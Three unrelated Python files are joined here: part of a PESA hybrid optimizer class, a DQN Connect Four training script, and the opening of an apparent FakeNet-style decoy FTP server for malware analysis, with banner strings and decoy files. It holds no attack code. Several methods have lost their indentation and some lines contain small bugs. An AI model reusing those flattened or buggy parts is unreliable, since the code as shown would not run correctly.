                self.swm_next[index].append(list(self.v0*np.array(pso_replay[sample][0])))
                self.swm_next[index].append(pso_replay[sample][1])
                self.local_pos_next.append(pso_replay[sample][0])
                self.local_fit_next.append(pso_replay[sample][1])
                index+=1

        #update the dictionary with new samples for DE
        de_replay=self.mymemory.sample(batch_size=self.DE_MEMORY,mode=self.MODE,alpha=self.ALPHA)
        index=self.MU
        for sample in range(self.DE_MEMORY):
            self.de_next[index].append(de_replay[sample][0])
            self.de_next[index].append(de_replay[sample][1])
            index+=1
        # DE's evolute() expects a plain list of positions, so strip the
        # fitness values and the dict wrapper.
        self.de_next=[self.de_next[item][0] for item in self.de_next]
    def init_guess(self, pop0):
        #"""
        #This function takes initial guess pop0 and returns initial guesses for SA, PSO, and ES
        #to start PESA evolution
        #inputs:
        #    pop0 (dict): dictionary contains initial population to start with for all methods
        #returns:
        #    espop0 (dict): initial population for ES
        #    swarm0 (dict): initial swarm for PSO
        #    swm_pos (list), swm_fit (float): initial guess for swarm best position and fitness for PSO
        #    local_pos (list of lists), local_fit (list): initial guesses for local best position of each particle and their fitness for PSO
        #    x0 (list of lists), E0 (list): initial input vectors and their initial fitness for SA
        #"""
        # Sort all warmup samples by fitness (value index 2), best first.
        pop0=list(pop0.items())
        pop0.sort(key=lambda e: e[1][2], reverse=True)
        # DE seed: best NPOP positions and their fitness values.
        sorted_de=dict(pop0[:self.NPOP])
        x0_de, fit0_de=[sorted_de[key][0] for key in sorted_de], [sorted_de[key][2] for key in sorted_de] # initial guess for DE
        #sorted_pso=dict(sorted(pop0.items(), key=lambda e: e[1][2], reverse=True)[:self.NPAR])   # sort the initial samples for PSO
        #sorted_es=dict(sorted(pop0.items(), key=lambda e: e[1][2], reverse=True)[:self.LAMBDA])  # sort the initial samples for ES
        sorted_pso=dict(pop0[:self.NPAR])
        sorted_es=dict(pop0[:self.LAMBDA])
        swarm0=defaultdict(list)
        espop0=defaultdict(list)
        local_pos=[]
        local_fit=[]
        index=0
        # Build the PSO swarm: each entry is [position, velocity, fitness];
        # the initial velocity is the position scaled by v0.
        for key in sorted_pso:
            swarm0[index].append(sorted_pso[key][0])
            swarm0[index].append(list(self.v0*np.array(sorted_pso[key][0])))
            swarm0[index].append(sorted_pso[key][2])
            local_pos.append(sorted_pso[key][0])
            local_fit.append(sorted_pso[key][2])
            index+=1
        # The best warmup sample (slot 0 after sorting) seeds the global best.
        swm_pos=swarm0[0][0]
        swm_fit=swarm0[0][2]
        index=0
        # Build the ES population: [individual, strategy vector, fitness].
        for key in sorted_es:
            espop0[index].append(sorted_es[key][0])
            espop0[index].append(sorted_es[key][1])
            espop0[index].append(sorted_es[key][2])
            index+=1
        return espop0, swarm0, swm_pos, swm_fit, local_pos, local_fit, x0_de, fit0_de
def printout(self, mode, gen):
#"""
#Print statistics to screen
#inputs:
# mode (int): 1 to print for individual algorathims and 2 to print for PESA
# gen (int): current generation number
#"""
if mode == 1:
print('***********************************************************************************************')
print('############################################################')
print('ES step {}/{}, CX={}, MUT={}, MU={}, LAMBDA={}'.format(self.STEP0-1,self.STEPS, np.round(self.CXPB,2), np.round(self.MUTPB,2), self.MU, self.LAMBDA))
print('############################################################')
print('Statistics for generation {}'.format(gen))
print('Best Fitness:', np.round(np.max(self.rwd),4) if self.mode is 'max' else -np.round(np.max(self.rwd),4))
print('Max Strategy:', np.round(np.max(self.mean_strategy),3))
print('Min Strategy:', np.round(np.min(self.mean_strategy),3))
print('Average Strategy:', np.round(np.mean(self.mean_strategy),3))
print('############################################################')
print('*****************************************************************************')
print('DE step {}/{}, NPOP={}, F={}, CR={}'.format(self.STEP0-1,self.STEPS,self.NPOP,np.round(self.F), self.CR))
print('****************************************************************************')
print('Statistics for generation {}'.format(gen))
print('Best Individual Fitness:', np.round(np.max(self.yde_best),4) if self.mode is 'max' else -np.round(np.max(self.yde_best),4))
print('Best Individual Position:', np.round(self.de_best),3)
print('****************************************************************************')
if self.pso_flag:
print('^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^')
print('PSO step {}/{}, C1={}, C2={}, Particles={}'.format(self.STEP0-1,self.STEPS, np.round(self.C1,2), np.round(self.C2,2), self.NPAR))
print('^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^')
print('Statistics for generation {}'.format(gen))
print('Best Swarm Fitness:', np.round(self.swm_fit,4) if self.mode is 'max' else -np.round(self.swm_fit,4))
print('Best Swarm Position:', np.round(self.swm_pos,2))
print('Max Speed:', np.round(np.max(self.mean_speed),3))
print('Min Speed:', np.round(np.min(self.mean_speed),3))
print('Average Speed:', np.round(np.mean(self.mean_speed),3))
print('^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^')
if mode == 2:
print('------------------------------------------------------------')
print('PESA step {}/{}'.format(self.STEP0-1,self.STEPS))
print('------------------------------------------------------------')
print('PESA statistics for generation {}'.format(gen))
print('Best Fitness:', self.pesa_best[1] if self.mode is 'max' else -self.pesa_best[1])
print('Best Individual:', np.round(self.pesa_best[0],2))
print('ALPHA:', np.round(self.ALPHA,3))
print('Memory Size:', self.memory_size)
print('------------------------------------------------------------')
print('***********************************************************************************************') |
sample_nn.py | import os
from operator import itemgetter
# Comment next line to run on GPU. With this configuration, it looks to run faster on CPU i7-8650U
# NOTE: must be set before TensorFlow/Keras is imported to take effect.
os.environ['CUDA_VISIBLE_DEVICES'] = '-1'  # fixed typo: was 'CUDA_VISIBLE_D5EVICES', which silently left the GPU enabled
import random
import warnings
import gym
from keras.layers import Dense, Flatten
from keras.models import Sequential
from keras.optimizers import Adam
from gym_connect_four import ConnectFourEnv, Player, RandomPlayer, ResultType, SavedPlayer
ENV_NAME = "ConnectFour-v0"
TRAIN_EPISODES = 100000
import threading
import time
from statistics import mean
import matplotlib
from plotly.subplots import make_subplots
matplotlib.use('Agg')
import matplotlib.pyplot as plt
from collections import deque
import os
import csv
import numpy as np
import pandas as pd
from plotly import graph_objects as go
SCORES_CSV_PATH = "./scores/scores.csv"
SCORES_PNG_PATH = "./scores/scores.png"
SOLVED_CSV_PATH = "./scores/solved.csv"
SOLVED_PNG_PATH = "./scores/solved.png"
AVERAGE_SCORE_TO_SOLVE = 195
CONSECUTIVE_RUNS_TO_SOLVE = 200
PLOT_REFRESH = 50
class ScoreLogger:
    def __init__(self, env_name, success_rounds=20):
        """Track run scores and rolling averages for logging/plotting.

        :param env_name: label used as the matplotlib plot title
        :param success_rounds: window size for the short rolling average
        """
        self.scores = deque(maxlen=CONSECUTIVE_RUNS_TO_SOLVE)
        self.averages = deque(maxlen=CONSECUTIVE_RUNS_TO_SOLVE)
        self.last_20_avg = deque(maxlen=CONSECUTIVE_RUNS_TO_SOLVE)
        self._N = success_rounds
        # Short window of the most recent scores (length `success_rounds`).
        self.last20_scores = deque(maxlen=success_rounds)
        self.exp_rates = deque(maxlen=CONSECUTIVE_RUNS_TO_SOLVE)
        self.time_hist = deque(maxlen=CONSECUTIVE_RUNS_TO_SOLVE)
        self.t1 = time.time()  # session start, for elapsed-time tracking
        self.env_name = env_name
        # Start each session from a clean slate: drop previous score files.
        if os.path.exists(SCORES_PNG_PATH):
            os.remove(SCORES_PNG_PATH)
        if os.path.exists(SCORES_CSV_PATH):
            os.remove(SCORES_CSV_PATH)
    def show_graph(self, y: pd.DataFrame):
        """Render score/mean/exploration/time traces in an interactive Plotly figure.

        Expects `y` to carry columns 'score', 'm', 'm20', 'expl' and 'time';
        'time' is drawn against a secondary y-axis since its scale differs.
        """
        self.fig = make_subplots(specs=[[{"secondary_y": True}]])
        self.fig.add_trace(go.Scatter(x=y.index, y=y.score, name="score"))
        self.fig.add_trace(go.Scatter(x=y.index, y=y.m, name="mean"))
        self.fig.add_trace(go.Scatter(x=y.index, y=y.m20, name=f"mean_last{self._N}"))
        self.fig.add_trace(go.Scatter(x=y.index, y=y.expl, name="expl"))
        self.fig.add_trace(go.Scatter(x=y.index, y=y.time, name="time"), secondary_y=True)
        self.fig.show()
    def add_score(self, score: int, run: int, exploration_rate: float, memory_size: int, refresh=False):
        """Record one finished run: persist CSV/PNG, update rolling stats,
        optionally redraw the Plotly dashboard, and terminate once 'solved'.

        :param score: score of the run that just finished
        :param run: 1-based run counter
        :param exploration_rate: current epsilon of the agent (printed/plotted)
        :param memory_size: current replay-buffer size (printed only)
        :param refresh: when True, refresh the interactive graph in a thread
        """
        self._save_csv(SCORES_CSV_PATH, score)
        self._save_png(input_path=SCORES_CSV_PATH,
                       output_path=SCORES_PNG_PATH,
                       x_label="runs",
                       y_label="scores",
                       average_of_n_last=CONSECUTIVE_RUNS_TO_SOLVE,
                       show_goal=True,
                       show_trend=True,
                       show_legend=True)
        self.scores.append(score)
        self.last20_scores.append(score)
        last_20mean = mean(self.last20_scores)
        self.last_20_avg.append(last_20mean)
        mean_score = mean(self.scores)
        self.averages.append(mean_score)
        self.exp_rates.append(exploration_rate)
        td = time.time() - self.t1  # elapsed seconds since logger creation
        self.time_hist.append(td)
        if refresh:
            # Here we start a new thread as because of a bug in Plotly, sometimes the fig.show() doesn't return at all and process freezes
            y = pd.DataFrame(zip(self.scores, self.averages, self.last_20_avg, self.exp_rates, self.time_hist),
                             columns=['score', 'm', 'm20', 'expl', 'time'])
            threading.Thread(target=self.show_graph, args=(y,)).start()
        print(f"Run {run:3}: (avg: {mean_score:2.3f}, last{self._N}_avg: {last_20mean:2.3f}, expl: {exploration_rate:1.3}, "
              f"mem_sz: {memory_size!s}, time: {td:3.1})\n")
        # NOTE(review): with AVERAGE_SCORE_TO_SOLVE=195 this 'solved' branch
        # looks unreachable for +/-1 game scores (rolling mean <= 1) -- likely
        # a carry-over from a CartPole scaffold; confirm whether it is
        # intentionally dead here.
        if mean_score >= AVERAGE_SCORE_TO_SOLVE and len(self.scores) >= CONSECUTIVE_RUNS_TO_SOLVE:
            solve_score = run - CONSECUTIVE_RUNS_TO_SOLVE
            print("Solved in " + str(solve_score) + " runs, " + str(run) + " total runs.")
            self._save_csv(SOLVED_CSV_PATH, solve_score)
            self._save_png(input_path=SOLVED_CSV_PATH,
                           output_path=SOLVED_PNG_PATH,
                           x_label="trials",
                           y_label="steps before solve",
                           average_of_n_last=None,
                           show_goal=False,
                           show_trend=False,
                           show_legend=False)
            exit()
    def _save_png(self, input_path, output_path, x_label, y_label, average_of_n_last, show_goal, show_trend, show_legend):
        """Plot the integer scores stored in `input_path` (one per CSV row)
        and save the resulting figure to `output_path`.

        :param average_of_n_last: window for the dashed average line
            (None = average over everything plotted so far)
        :param show_goal: draw the horizontal AVERAGE_SCORE_TO_SOLVE line
        :param show_trend: draw a degree-1 polynomial fit of the scores
        :param show_legend: toggle the legend
        """
        x = []
        y = []
        with open(input_path, "r") as scores:
            reader = csv.reader(scores)
            data = list(reader)
            j = 0
            # Skip blank rows the CSV may contain; j re-indexes the kept rows.
            for i in range(0, len(data)):
                if len(data[i]) == 0:
                    continue
                x.append(int(j))
                y.append(int(data[i][0]))
                j += 1
        plt.subplots()
        plt.plot(x, y, label="score per run")
        average_range = average_of_n_last if average_of_n_last is not None else len(x)
        # Horizontal dashed line at the mean of the last `average_range` scores.
        plt.plot(x[-average_range:], [np.mean(y[-average_range:])] * len(y[-average_range:]), linestyle="--",
                 label="last " + str(average_range) + " runs average")
        if show_goal:
            plt.plot(x, [AVERAGE_SCORE_TO_SOLVE] * len(x), linestyle=":", label=str(AVERAGE_SCORE_TO_SOLVE) + " score average goal")
        if show_trend and len(x) > 1:
            # Linear trend fit, skipping the very first point.
            trend_x = x[1:]
            z = np.polyfit(np.array(trend_x), np.array(y[1:]), 1)
            p = np.poly1d(z)
            plt.plot(trend_x, p(trend_x), linestyle="-.", label="trend")
        plt.title(self.env_name)
        plt.xlabel(x_label)
        plt.ylabel(y_label)
        if show_legend:
            plt.legend(loc="upper left")
        plt.savefig(output_path, bbox_inches="tight")
        plt.close()
def _save_csv(self, path, score):
if not os.path.exists(path):
with open(path, "w"):
pass
scores_file = open(path, "a")
with scores_file:
writer = csv.writer(scores_file)
writer.writerow([score])
class DQNSolver:
"""
Vanilla Multi Layer Perceptron version
"""
    def __init__(self, observation_space, action_space):
        """Build the replay buffer and the MLP Q-network.

        :param observation_space: board shape tuple, e.g. (rows, columns)
        :param action_space: number of discrete actions (playable columns)
        """
        # Q-learning / exploration hyperparameters
        self.GAMMA = 0.95               # discount factor
        self.LEARNING_RATE = 0.001
        self.MEMORY_SIZE = 512          # replay-buffer capacity
        self.BATCH_SIZE = 32
        self.EXPLORATION_MAX = 1.0
        self.EXPLORATION_MIN = 0.0
        self.EXPLORATION_DECAY = 0.995  # multiplicative epsilon decay per replay
        self.exploration_rate = self.EXPLORATION_MAX
        self.isFit = False              # flips to True after the first fit()
        self.action_space = action_space
        self.memory = deque(maxlen=self.MEMORY_SIZE)
        # Total number of board cells; hidden layers are sized at twice that.
        obs_space_card = observation_space[0] * observation_space[1]
        # Plain MLP: flatten the board, 4 ReLU hidden layers, linear Q-head.
        self.model = Sequential()
        self.model.add(Flatten(input_shape=observation_space))
        self.model.add(Dense(obs_space_card * 2, activation="relu"))
        self.model.add(Dense(obs_space_card * 2, activation="relu"))
        self.model.add(Dense(obs_space_card * 2, activation="relu"))
        self.model.add(Dense(obs_space_card * 2, activation="relu"))
        self.model.add(Dense(self.action_space, activation="linear"))
        self.model.compile(loss="mse", optimizer=Adam(lr=self.LEARNING_RATE))
    def remember(self, state, action, reward, next_state, done):
        """Store one transition tuple in the bounded replay buffer
        (oldest entries are evicted automatically by the deque)."""
        self.memory.append((state, action, reward, next_state, done))
def act(self, state, available_moves):
if np.random.rand() < self.exploration_rate:
return random.choice(list(available_moves))
q_values = self.model.predict(state)[0]
vs = [(i, q_values[i]) for i in available_moves]
act = max(vs, key=itemgetter(1))
return act[0]
    def experience_replay(self):
        """Sample a minibatch from memory and run one Q-learning update pass.

        Epsilon only starts decaying once the model has been fit at least
        once, so the agent keeps exploring at full rate before learning starts.
        """
        if self.isFit:
            self.exploration_rate *= self.EXPLORATION_DECAY
            self.exploration_rate = max(self.EXPLORATION_MIN, self.exploration_rate)
        if len(self.memory) < self.BATCH_SIZE:
            return
        batch = random.sample(self.memory, self.BATCH_SIZE)
        # Force the freshest transition into the batch.
        batch[-1] = self.memory[-1]
        if self.BATCH_SIZE > 1:
            # NOTE(review): this puts memory[-1] into TWO batch slots --
            # possibly meant to be self.memory[-2]; confirm intent.
            batch[-2] = self.memory[-1]
        if not self.isFit:
            # Bootstrap fit against zeros so predict() below runs on
            # initialized weights.
            states = list(map(lambda _: _[0][0], batch))
            states = np.array(states)
            self.model.fit(states, np.zeros((len(batch), self.action_space)), verbose=0)
        for state, action, reward, state_next, terminal in batch:
            q_update = reward
            if not terminal:
                # Bellman target: r + gamma * max_a' Q(s', a')
                q_update = (reward + self.GAMMA * np.amax(self.model.predict(state_next)[0]))
            q_values = self.model.predict(state)
            q_values[0][action] = q_update
            self.model.fit(state, q_values, verbose=0)
        self.isFit = True
    def save_model(self, file_prefix: str):
        """Serialize the Keras model to ``<file_prefix>.h5``."""
        self.model.save(f"{file_prefix}.h5")
class NNPlayer(Player):
    def __init__(self, env, name='RandomPlayer'):
        """Wrap a ConnectFour environment with a DQN learner plus score
        bookkeeping used by the early-stop logic in learn()."""
        super(NNPlayer, self).__init__(env, name)
        self.observation_space = env.observation_space.shape
        self.action_space = env.action_space.n
        self.dqn_solver = DQNSolver(self.observation_space, self.action_space)
        self._N = 30  # rolling-average window, in finished rounds
        self.sl = ScoreLogger(str(self.__class__), success_rounds=self._N)
        self._STOP_THRESHOLD = 0.8  # 0.86- with RP
        self._last_N_rounds = deque(maxlen=self._N)
        self._round = 0
        self._score = 0
        self._total_score = 0
        self._max_avg_score = -100  # sentinel below any reachable average
    def get_next_action(self, state: np.ndarray) -> int:
        """Return the DQN-selected column for the current board state.

        NOTE(review): when the chosen action is not valid this method falls
        through and implicitly returns None despite the ``-> int`` annotation.
        act() only picks from available_moves, so this path should not
        normally trigger -- confirm callers tolerate it anyway.
        """
        # The network expects a batch dimension: reshape to (1, rows, cols).
        state = np.reshape(state, [1] + list(self.observation_space))
        action = self.dqn_solver.act(state, self.env.available_moves())
        if self.env.is_valid_action(action):
            return action
    def _stop_learn_condition(self):
        """True once the rolling average of the last ``_N`` round scores
        reaches ``_STOP_THRESHOLD``; checkpoints the model whenever a new
        best average is seen."""
        if len(self._last_N_rounds) < self._N:
            return False  # not enough finished rounds yet
        avg = mean(self._last_N_rounds)
        if avg > self._max_avg_score:
            # New best rolling average: save a checkpoint before continuing.
            self.save_model()
            self._max_avg_score = avg
            print(f"\n---------------New max_score {avg}. Saving model.")
        return avg >= self._STOP_THRESHOLD
    def learn(self, state, action, state_next, reward, done) -> None:
        """Store the transition, run one training step, track round scores.

        Terminates the whole process (after saving the model) once the
        rolling average over the last ``_N`` rounds reaches the stop threshold.
        """
        if self._stop_learn_condition():
            print(f"Stopping learning as got {mean(self._last_N_rounds)} avg on last{self._N}. Saving model & exiting")
            self.save_model()
            exit()
        # Network inputs are batched: prepend a batch dimension of 1.
        state = np.reshape(state, [1] + list(self.observation_space))
        state_next = np.reshape(state_next, [1] + list(self.observation_space))
        # reward = reward if not done else -reward
        self.dqn_solver.remember(state, action, reward, state_next, done)
        self.dqn_solver.experience_replay()
        if done:
            # Game over: the final reward doubles as the round score.
            self._last_N_rounds.append(int(reward))
            self._round += 1
            self._total_score += int(reward)
            self.sl.add_score(int(reward), self._round, self.dqn_solver.exploration_rate, len(self.dqn_solver.memory),
                              refresh=self._round % PLOT_REFRESH == 0)
def save_model(self):
self.dqn_solver.save_model(self.name)
def game(show_boards=False):
    """Train NNPlayer against a RandomPlayer for TRAIN_EPISODES games.

    Parameters
    ----------
    show_boards : bool
        If True, print the board and outcome after every game.
    """
    env: ConnectFourEnv = gym.make(ENV_NAME)
    player = NNPlayer(env, 'NNPlayer')
    opponent = RandomPlayer(env, 'OpponentRandomPlayer')
    players = [player, opponent]
    total_reward = 0
    wins = 0
    losses = 0
    draws = 0
    for run in range(1, TRAIN_EPISODES + 1):
        # Randomize which player moves first each episode.
        # NOTE(review): the bookkeeping below treats a positive result.value
        # as a win for `player` regardless of the shuffled order — confirm
        # env.run() reports results relative to `player`.
        random.shuffle(players)
        result = env.run(*players, board=None, render=False)
        reward = result.value
        total_reward += reward
        # result.value is assumed to be +1 (win), -1 (loss) or 0 (draw).
        wins += max(0, result.value)
        losses += max(0, -result.value)
        draws += (abs(result.value) + 1) % 2
        if show_boards:
            print("Run: " + str(run) + ", score: " + str(reward))
            if hasattr(player, 'dqn_solver'):
                print("exploration: " + str(player.dqn_solver.exploration_rate))
            if result == ResultType.WIN1:
                print(f"winner: {player.name}")
                print("board state:\n", env.board)
                print(f"reward={reward}")
            elif result == ResultType.WIN2:
                print(f"lost to: {opponent.name}")
                print("board state:\n", env.board)
                print(f"reward={reward}")
            elif result == ResultType.DRAW:
                print(f"draw after {player.name} move")
                print("board state:\n", env.board)
                print(f"reward={reward}")
            else:
                raise ValueError("Unknown result type")
    print(
        f"Wins [{wins}], Draws [{draws}], Losses [{losses}] - Total reward {total_reward}, average reward {total_reward / TRAIN_EPISODES}")
    player.save_model()
if __name__ == "__main__":
    # Suppress library warnings (e.g. framework deprecation noise) while training.
    with warnings.catch_warnings():
        warnings.simplefilter("ignore")
        game(False)
|
FTPListener.py | import logging
import os
import sys
import threading
import SocketServer
import ssl
import socket
from . import *
from pyftpdlib.authorizers import DummyAuthorizer
from pyftpdlib.handlers import FTPHandler, TLS_FTPHandler
from pyftpdlib.filesystems import AbstractedFS
from pyftpdlib.servers import ThreadedFTPServer
import BannerFactory
# Placeholder credentials; the handlers below accept any username/password.
FAKEUSER = 'FAKEUSER'
FAKEPWD = 'FAKEPWD'

# Canned file served for a requested path that does not exist, keyed by the
# requested file's extension (fallback handled at the lookup site).
EXT_FILE_RESPONSE = {
    '.html': u'FakeNet.html',
    '.png' : u'FakeNet.png',
    '.ico' : u'FakeNet.ico',
    '.jpeg': u'FakeNet.jpg',
    '.exe' : u'FakeNetMini.exe',
    '.pdf' : u'FakeNet.pdf',
    '.xml' : u'FakeNet.html',
    '.txt' : u'FakeNet.txt',
}
# Adapted from various sources including https://github.com/turbo/openftp4
#
# Values are either plain '{servername}'/'{tz}' templates (with strftime
# escapes) or callables taking the hostname.
#
# NOTE: some X2 WS_FTP keys deliberately keep a trailing space (e.g.
# 'ws_ftp-3.1.3 ') to distinguish them from the V2 entry of the same version.
# The original dict literal contained duplicate keys; exact duplicates were
# removed, and conflicting duplicates were given distinct '-v2'/'-fips'
# suffixed keys so no banner variant is silently shadowed.
BANNERS = {
    'generic': '{servername} FTP Server',
    'ncftpd': '{servername} NcFTPD Server (licensed copy) ready.',
    'unspec1': lambda hostname: 'FTP server ready',
    'unspec2': lambda hostname: 'FTP server ready %s',
    'iis': lambda hostname: '%s Microsoft FTP Service',
    'iis-3.0': lambda hostname: '%s Microsoft FTP Service (Version 3.0)',
    'iis-4.0': lambda hostname: '%s Microsoft FTP Service (Version 4.0)',
    'iis-5.0': lambda hostname: '%s Microsoft FTP Service (Version 5.0)',
    'iis-6.0': lambda hostname: '%s Microsoft FTP Service (Version 6.0)',
    'vs-2.0.7': lambda hostname: '(vsFTPd 2.0.7)',
    'vs-2.1.0': lambda hostname: '(vsFTPd 2.1.0)',
    'vs-2.1.2': lambda hostname: '(vsFTPd 2.1.2)',
    'vs-2.2.0': lambda hostname: '(vsFTPd 2.2.0)',
    'vs-2.2.1': lambda hostname: '(vsFTPd 2.2.1)',
    'vs-2.2.2': lambda hostname: '(vsFTPd 2.2.2)',
    'vs-2.3.0': lambda hostname: '(vsFTPd 2.3.0)',
    'vs-2.3.1': lambda hostname: '(vsFTPd 2.3.1)',
    'vs-2.3.2': lambda hostname: '(vsFTPd 2.3.2)',
    'vs-2.3.4': lambda hostname: '(vsFTPd 2.3.4)',
    'vs-2.3.5': lambda hostname: '(vsFTPd 2.3.5)',
    'wu-2.4(1)': '{servername} (Version wu-2.4(1) %a %b %d %H:%M:%S {tz} %Y) ready.',
    'wu-2.4(2)': '{servername} (Version wu-2.4(2) %a %b %d %H:%M:%S {tz} %Y) ready.',
    'wu-2.4(20)': '{servername} (Version wu-2.4(20) %a %b %d %H:%M:%S {tz} %Y) ready.',
    'wu-2.4.2-academ(1)': '{servername} (Version wu-2.4.2-academ (1) %a %b %d %H:%M:%S {tz} %Y) ready.',
    'wu-2.4.2-academ[BETA-15](1)': '{servername} (Version wu-2.4.2-academ[BETA-15](1) %a %b %d %H:%M:%S {tz} %Y) ready.',
    'wu-2.4.2-academ[BETA-16](1)': '{servername} (Version wu-2.4.2-academ[BETA-16](1) %a %b %d %H:%M:%S {tz} %Y) ready.',
    'wu-2.4.2-academ[BETA-18](1)': '{servername} (Version wu-2.4.2-academ[BETA-18](1) %a %b %d %H:%M:%S {tz} %Y) ready.',
    'wu-2.4.2-academ[BETA-9](1)': '{servername} (Version wu-2.4.2-academ[BETA-9](1) %a %b %d %H:%M:%S {tz} %Y) ready.',
    'wu-2.4.2-VR16(1)': '{servername} (Version wu-2.4.2-VR16(1) %a %b %d %H:%M:%S {tz} %Y) ready.',
    'wu-2.4.2-VR17(1)': '{servername} (Version wu-2.4.2-VR17(1) %a %b %d %H:%M:%S {tz} %Y) ready.',
    'wu-2.4(3)': '{servername} (Version wu-2.4(3) %a %b %d %H:%M:%S {tz} %Y) ready.',
    'wu-2.4(4)': '{servername} (Version wu-2.4(4) %a %b %d %H:%M:%S {tz} %Y) ready.',
    'wu-2.4(6)': '{servername} (Version wu-2.4(6) %a %b %d %H:%M:%S {tz} %Y) ready.',
    'wu-2.5.0(1)': '{servername} (Version wu-2.5.0(1) %a %b %d %H:%M:%S {tz} %Y) ready.',
    'wu-2.6.0(1)': '{servername} (Version wu-2.6.0(1) %a %b %d %H:%M:%S {tz} %Y) ready.',
    'wu-2.6.0(2)': '{servername} (Version wu-2.6.0(2) %a %b %d %H:%M:%S {tz} %Y) ready.',
    'wu-2.6.0(4)': '{servername} (Version wu-2.6.0(4) %a %b %d %H:%M:%S {tz} %Y) ready.',
    'wu-2.6.0(5)': '{servername} (Version wu-2.6.0(5) %a %b %d %H:%M:%S {tz} %Y) ready.',
    'wu-2.6.0(7)': '{servername} (Version wu-2.6.0(7) %a %b %d %H:%M:%S {tz} %Y) ready.',
    'wu-2.6.1-0.6x.21': '{servername} (Version wu-2.6.1-0.6x.21 %a %b %d %H:%M:%S {tz} %Y) ready.',
    'wu-2.6.1(1)': '{servername} (Version wu-2.6.1(1) %a %b %d %H:%M:%S {tz} %Y) ready.',
    'wu-2.6.1(12)': '{servername} (Version wu-2.6.1(12) %a %b %d %H:%M:%S {tz} %Y) ready.',
    'wu-2.6.1-16': '{servername} (Version wu-2.6.1-16 %a %b %d %H:%M:%S {tz} %Y) ready.',
    'wu-2.6.1-16.7x.1': '{servername} (Version wu-2.6.1-16.7x.1 %a %b %d %H:%M:%S {tz} %Y) ready.',
    'wu-2.6.1-18': '{servername} (Version wu-2.6.1-18 %a %b %d %H:%M:%S {tz} %Y) ready.',
    'wu-2.6.1(2)': '{servername} (Version wu-2.6.1(2) %a %b %d %H:%M:%S {tz} %Y) ready.',
    'wu-2.6.1-20': '{servername} (Version wu-2.6.1-20 %a %b %d %H:%M:%S {tz} %Y) ready.',
    'wu-2.6.1-21': '{servername} (Version wu-2.6.1-21 %a %b %d %H:%M:%S {tz} %Y) ready.',
    'wu-2.6.1-23.2': '{servername} (Version wu-2.6.1-23.2 %a %b %d %H:%M:%S {tz} %Y) ready.',
    'wu-2.6.1-24': '{servername} (Version wu-2.6.1-24 %a %b %d %H:%M:%S {tz} %Y) ready.',
    'wu-2.6.1-24.1': '{servername} (Version wu-2.6.1-24.1 %a %b %d %H:%M:%S {tz} %Y) ready.',
    'wu-2.6.1(3)': '{servername} (Version wu-2.6.1(3) %a %b %d %H:%M:%S {tz} %Y) ready.',
    'wu-2.6.2(1)': '{servername} (Version wu-2.6.2(1) %a %b %d %H:%M:%S {tz} %Y) ready.',
    'wu-2.6.2(11)': '{servername} (Version wu-2.6.2(11) %a %b %d %H:%M:%S {tz} %Y) ready.',
    'wu-2.6.2-11.1204.1ubuntu': '{servername} (Version wu-2.6.2-11.1204.1ubuntu %a %b %d %H:%M:%S {tz} %Y) ready.',
    'wu-2.6.2-11.71.1': '{servername} (Version wu-2.6.2-11.71.1 %a %b %d %H:%M:%S {tz} %Y) ready.',
    'wu-2.6.2-11.72.1': '{servername} (Version wu-2.6.2-11.72.1 %a %b %d %H:%M:%S {tz} %Y) ready.',
    'wu-2.6.2-11.73.1': '{servername} (Version wu-2.6.2-11.73.1 %a %b %d %H:%M:%S {tz} %Y) ready.',
    'wu-2.6.2-11.73.1mdk': '{servername} (Version wu-2.6.2-11.73.1mdk %a %b %d %H:%M:%S {tz} %Y) ready.',
    'wu-2.6.2-12': '{servername} (Version wu-2.6.2-12 %a %b %d %H:%M:%S {tz} %Y) ready.',
    'wu-2.6.2-12.1.co5.PROX': '{servername} (Version wu-2.6.2-12.1.co5.PROX %a %b %d %H:%M:%S {tz} %Y) ready.',
    'wu-2.6.2-12.rhel2': '{servername} (Version wu-2.6.2-12.rhel2 %a %b %d %H:%M:%S {tz} %Y) ready.',
    'wu-2.6.2(13)': '{servername} (Version wu-2.6.2(13) %a %b %d %H:%M:%S {tz} %Y) ready.',
    'wu-2.6.2.1(5)': '{servername} (Version wu-2.6.2.1(5) %a %b %d %H:%M:%S {tz} %Y) ready.',
    'wu-2.6.2(15)': '{servername} (Version wu-2.6.2(15) %a %b %d %H:%M:%S {tz} %Y) ready.',
    'wu-2.6.2-15.7x.legacy': '{servername} (Version wu-2.6.2-15.7x.legacy %a %b %d %H:%M:%S {tz} %Y) ready.',
    'wu-2.6.2-15.7x.PROX': '{servername} (Version wu-2.6.2-15.7x.PROX %a %b %d %H:%M:%S {tz} %Y) ready.',
    'wu-2.6.2(16)': '{servername} (Version wu-2.6.2(16) %a %b %d %H:%M:%S {tz} %Y) ready.',
    'wu-2.6.2(2)': '{servername} (Version wu-2.6.2(2) %a %b %d %H:%M:%S {tz} %Y) ready.',
    'wu-2.6.2(3)': '{servername} (Version wu-2.6.2(3) %a %b %d %H:%M:%S {tz} %Y) ready.',
    'wu-2.6.2(4)': '{servername} (Version wu-2.6.2(4) %a %b %d %H:%M:%S {tz} %Y) ready.',
    'wu-2.6.2-468': '{servername} (Version wu-2.6.2-468 %a %b %d %H:%M:%S {tz} %Y) ready.',
    'wu-2.6.2(47)': '{servername} (Version wu-2.6.2(47) %a %b %d %H:%M:%S {tz} %Y) ready.',
    'wu-2.6.2(48)': '{servername} (Version wu-2.6.2(48) %a %b %d %H:%M:%S {tz} %Y) ready.',
    'wu-2.6.2-5': '{servername} (Version wu-2.6.2-5 %a %b %d %H:%M:%S {tz} %Y) ready.',
    'wu-2.6.2(5)': '{servername} (Version wu-2.6.2(5) %a %b %d %H:%M:%S {tz} %Y) ready.',
    'wu-2.6.2(52)': '{servername} (Version wu-2.6.2(52) %a %b %d %H:%M:%S {tz} %Y) ready.',
    'ws_ftp-2.0.4': '{servername} V2 WS_FTP Server 2.0.4 (0)',
    'ws_ftp-3.1.3': '{servername} V2 WS_FTP Server 3.1.3 (0)',
    'ws_ftp-5.0.5': '{servername} V2 WS_FTP Server 5.0.5 (0)',
    'ws_ftp-7.5.1-v2': '{servername} V2 WS_FTP Server 7.5.1(0)',
    'ws_ftp-7.7-v2': '{servername} V2 WS_FTP Server 7.7(0)',
